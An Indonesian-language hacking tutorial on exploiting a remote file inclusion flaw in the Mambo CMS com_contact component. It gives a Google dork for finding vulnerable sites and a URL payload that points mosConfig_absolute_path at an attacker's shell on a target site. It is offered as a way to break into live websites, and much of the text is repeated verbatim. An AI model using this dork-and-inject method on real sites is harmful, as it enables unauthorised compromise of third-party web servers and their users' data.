mencari vurnable disebuah website bukan hal yang mudah, harus punya kesabaran penuh,dan ketelitian,nah kali ini saya mau nulis gimana cara nyari vurn di sebuah website aplikasi php,
saya ambil contoh dari software mambo,cos banyak sekali vurn di software itu,saya ambil contoh di file contact.class.php
yaitu di :
include_once( $mosConfig_absolute_path .'/includes/vcard.class.php' )
letak file itu ada di folder components/com_contact
jadi seumpama mau nyari website yang masih bisa dimasuki php injection caranya gini
buka google : ketik inurl:"com_contact"
trus coba masukin php injectnya
semisal www.target.com/index.php?option=com_contact&bla&bla&bla
menjadi : www.target.com/components/com_contact/contact.class.php?mosConfig_absolute_path=shell
vurn web aplikasi php semuanya ada di depan include ,include_once , require , require_once dan ada tanda $ sebelum keterangan selanjutnya seperti contoh diatas.
saya ambil contoh dari software mambo,cos banyak sekali vurn di software itu,saya ambil contoh di file contact.class.php
yaitu di :
include_once( $mosConfig_absolute_path .'/includes/vcard.class.php' )
letak file itu ada di folder components/com_contact
jadi seumpama mau nyari website yang masih bisa dimasuki php injection caranya gini
buka google : ketik inurl:"com_contact"
trus coba masukin php injectnya
semisal www.target.com/index.php?option=com_contact&bla&bla&bla
menjadi : www.target.com/components/com_contact/contact.class.php?mosConfig_absolute_path=shell
vurn web aplikasi php semuanya ada di depan include ,include_once , require , require_once dan ada tanda $ sebelum keterangan selanjutnya seperti contoh diatas.
